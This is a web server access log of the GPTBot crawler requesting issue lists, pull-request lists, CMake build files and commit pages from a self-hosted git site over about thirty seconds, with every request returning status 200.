"/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:19:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:19:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" +[17/Feb/2026:19:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" +[17/Feb/2026:19:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:19:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:19:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2finstall_service.bat" [Client 74.7.227.38] [Length 24698] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:19:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr 